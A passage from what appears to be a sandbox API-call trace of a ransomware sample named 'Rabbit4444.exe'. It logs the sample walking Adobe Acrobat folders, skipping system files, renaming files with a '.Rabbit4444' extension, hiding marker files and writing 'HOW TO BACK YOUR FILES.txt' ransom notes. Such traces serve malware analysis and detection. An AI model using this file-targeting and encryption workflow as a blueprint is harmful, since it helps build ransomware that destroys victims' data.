lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.114] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.114] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.114] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.114] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe991dbb4, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe991dbb4, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9943dc5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.114] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.114] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.114] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636b588b, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x636b588b, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x636b588b, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x16, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GlobData", cAlternateFileName="")) returned 1 [0054.114] lstrcmpiW (lpString1="GlobData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.114] lstrcmpiW (lpString1="GlobData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.114] lstrcmpiW (lpString1="GlobData", lpString2="Rabbit4444.exe") returned -1 [0054.114] lstrcmpiW (lpString1="GlobData", lpString2=".") returned 1 [0054.114] lstrcmpiW (lpString1="GlobData", lpString2="..") returned 1 [0054.114] lstrcmpiW (lpString1="GlobData", lpString2="windows") returned -1 [0054.114] lstrcmpiW (lpString1="GlobData", lpString2="bootmgr") returned 1 [0054.114] lstrcmpiW (lpString1="GlobData", lpString2="pagefile.sys") returned -1 [0054.114] lstrcmpiW (lpString1="GlobData", lpString2="boot") returned 1 [0054.114] lstrcmpiW (lpString1="GlobData", lpString2="ids.txt") returned -1 [0054.114] lstrcmpiW (lpString1="GlobData", lpString2="NTUSER.DAT") returned -1 [0054.114] lstrcpyW (in: lpString1=0x130ebaa, lpString2="GlobData" | out: lpString1="GlobData") returned="GlobData" [0054.114] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData", dwFileAttributes=0x0) returned 1 [0054.114] lstrlenW (lpString="GlobData") returned 8 [0054.114] lstrlenW (lpString="Rabbit4444") returned 10 [0054.114] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0054.114] lstrlenW (lpString=".dll") returned 4 [0054.115] lstrcmpiW (lpString1="Data", lpString2=".dll") returned 1 [0054.115] lstrlenW (lpString=".lnk") returned 4 [0054.115] lstrcmpiW (lpString1="Data", lpString2=".lnk") returned 1 [0054.115] lstrlenW (lpString=".ini") returned 4 [0054.115] lstrcmpiW (lpString1="Data", lpString2=".ini") returned 1 [0054.115] lstrlenW (lpString=".sys") returned 4 [0054.115] lstrcmpiW (lpString1="Data", lpString2=".sys") returned 1 [0054.115] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\globdata"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.115] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0054.115] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14542567891) returned 1 [0054.115] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=22) returned 1 [0054.115] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0054.115] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0054.115] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x298 [0054.117] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x70000 [0054.117] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0054.117] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0054.117] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0054.117] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0054.118] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0054.118] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0054.118] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0054.118] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0054.118] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14542863043) returned 1 [0054.118] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0054.118] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0054.118] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.118] CloseHandle (hObject=0x298) returned 1 [0054.118] CloseHandle (hObject=0x278) returned 1 [0054.118] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData.Rabbit4444") returned 76 [0054.118] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\globdata"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\globdata.rabbit4444"), dwFlags=0x1) returned 1 [0054.119] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe89495bf, ftCreationTime.dwHighDateTime=0x1d35e03, ftLastAccessTime.dwLowDateTime=0xe89495bf, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xe89495bf, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GlobSettings", cAlternateFileName="GLOBSE~1")) returned 1 [0054.119] lstrcmpiW (lpString1="GlobSettings", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.119] lstrcmpiW (lpString1="GlobSettings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.119] lstrcmpiW (lpString1="GlobSettings", lpString2="Rabbit4444.exe") returned -1 [0054.119] lstrcmpiW (lpString1="GlobSettings", lpString2=".") returned 1 [0054.119] lstrcmpiW (lpString1="GlobSettings", lpString2="..") returned 1 [0054.119] lstrcmpiW (lpString1="GlobSettings", lpString2="windows") returned -1 [0054.119] lstrcmpiW (lpString1="GlobSettings", lpString2="bootmgr") returned 1 [0054.119] lstrcmpiW (lpString1="GlobSettings", lpString2="pagefile.sys") returned -1 [0054.119] lstrcmpiW (lpString1="GlobSettings", lpString2="boot") returned 1 [0054.119] lstrcmpiW (lpString1="GlobSettings", lpString2="ids.txt") returned -1 [0054.119] lstrcmpiW (lpString1="GlobSettings", lpString2="NTUSER.DAT") returned -1 [0054.119] lstrcpyW (in: lpString1=0x130ebaa, lpString2="GlobSettings" | out: lpString1="GlobSettings") returned="GlobSettings" [0054.119] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings", dwFileAttributes=0x0) returned 1 [0054.119] lstrlenW (lpString="GlobSettings") returned 12 [0054.120] lstrlenW (lpString="Rabbit4444") returned 10 [0054.120] lstrcmpiW (lpString1="obSettings", lpString2="Rabbit4444") returned -1 [0054.120] lstrlenW (lpString=".dll") returned 4 [0054.120] lstrcmpiW (lpString1="ings", lpString2=".dll") returned 1 [0054.120] lstrlenW (lpString=".lnk") returned 4 [0054.120] lstrcmpiW (lpString1="ings", lpString2=".lnk") returned 1 [0054.120] lstrlenW (lpString=".ini") returned 4 [0054.120] lstrcmpiW (lpString1="ings", lpString2=".ini") returned 1 [0054.120] lstrlenW (lpString=".sys") returned 4 [0054.120] lstrcmpiW (lpString1="ings", lpString2=".sys") returned 1 [0054.120] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\globsettings"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.120] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0054.120] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14543074703) returned 1 [0054.120] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=24) returned 1 [0054.120] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0054.120] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0054.120] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x298 [0054.122] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x70000 [0054.123] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0054.123] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0054.123] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0054.123] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0054.123] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0054.123] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0054.123] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0054.123] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0054.123] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14543380502) returned 1 [0054.123] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0054.123] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0054.123] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.123] CloseHandle (hObject=0x298) returned 1 [0054.123] CloseHandle (hObject=0x278) returned 1 [0054.123] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings.Rabbit4444") returned 80 [0054.123] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\globsettings"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\globsettings.rabbit4444"), dwFlags=0x1) returned 1 [0054.125] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe89495bf, ftCreationTime.dwHighDateTime=0x1d35e03, ftLastAccessTime.dwLowDateTime=0xe89495bf, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xe89495bf, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GlobSettings", cAlternateFileName="GLOBSE~1")) returned 0 [0054.125] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0054.125] lstrcpyW (in: lpString1=0x130ebaa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.126] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.126] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.126] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.127] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.127] CloseHandle (hObject=0x278) returned 1 [0054.127] CloseHandle (hObject=0x27c) returned 1 [0054.127] GetCurrentThreadId () returned 0xd98 [0054.127] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6490 [0054.127] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms" [0054.127] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0054.127] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6488 | out: hHeap=0xe0000) returned 1 [0054.127] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms" [0054.127] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\" [0054.127] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\.BFC0E91B00AE8A0620D3" [0054.127] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\forms\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.129] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.133] FlushFileBuffers (hFile=0x27c) returned 1 [0054.134] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.135] CloseHandle (hObject=0x27c) returned 1 [0054.135] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms") returned 54 [0054.135] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.135] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5163cbb3, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5163cbb3, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9969ff2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0054.135] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.136] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.136] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.136] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.136] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5163cbb3, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5163cbb3, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9969ff2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.136] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.136] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.136] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.136] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.136] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.136] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9969ff2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9969ff2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9969ff2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.136] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.136] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.136] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9969ff2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9969ff2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9969ff2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0054.136] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0054.136] lstrcpyW (in: lpString1=0x130eba6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.136] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\forms\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.136] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.136] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.137] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.137] CloseHandle (hObject=0x278) returned 1 [0054.137] CloseHandle (hObject=0x27c) returned 1 [0054.137] GetCurrentThreadId () returned 0xd98 [0054.137] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6590 [0054.137] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab" [0054.137] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0054.137] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6588 | out: hHeap=0xe0000) returned 1 [0054.137] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab" [0054.137] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\" [0054.137] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\.BFC0E91B00AE8A0620D3" [0054.137] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\collab\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.139] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.141] FlushFileBuffers (hFile=0x27c) returned 1 [0054.142] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.143] CloseHandle (hObject=0x27c) returned 1 [0054.143] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab") returned 55 [0054.143] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.143] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x517e05da, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x517e05da, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9969ff2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102810 [0054.143] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.143] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.143] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.143] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.143] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x517e05da, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x517e05da, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9969ff2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.144] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.144] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.144] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.144] lstrcmpiW (lpString1="..", lpString2=".") 